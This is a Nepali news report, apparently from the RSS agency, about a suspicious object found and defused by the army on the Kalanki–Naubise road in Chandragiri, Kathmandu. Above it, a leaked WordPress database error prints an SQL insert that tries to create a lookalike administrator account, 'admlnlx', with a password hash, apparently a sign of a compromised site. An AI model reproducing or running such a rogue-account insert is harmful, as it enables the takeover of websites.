WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqiOf/f6SNqOaa2XSOAHTfGCml6otT0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:32:02', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । काठमाडौँको चन्द्रागिरि नगरपालिकास्थित ढुङ्गेअड्डामा शङ्कास्पद वस्तु फेला परेको छ । चन्द्रागिरि नगरपालिका–१५ ढुङ्गेअड्डाको मुख्य सडकमा शङ्कास्पद वस्तु फेला परेको हो ।
महानगरीय प्रहरी परिसर काठमाडौँका प्रवक्ता प्रहरी उपरीक्षक दिनेशराज मैनालीले कलङ्की–नागढुङ्गाको मुख्य सडकमा आज बिहान २ बजेतिर उक्त वस्तु फेला परेको बताउनुभयो । उहाँले आम नागरिकलाई त्रास सिर्जना गर्नका लागि उक्त शङ्स्कास्पद वस्तु छाडिएको जानकारी दिए । उक्त वस्तुलाई अहिले नेपाली सेनाको टोलीले निस्क्रिय पारेको छ ।
शङ्कास्पद वस्तु भेटिएसँगै नागढुङ्गा नाका भएर काठमाडौँ उपत्यका भित्रिने तथा काठमाडौँ बाहिर जाने सवारीसाधन बाटोमै रोकिएका छन् । रासस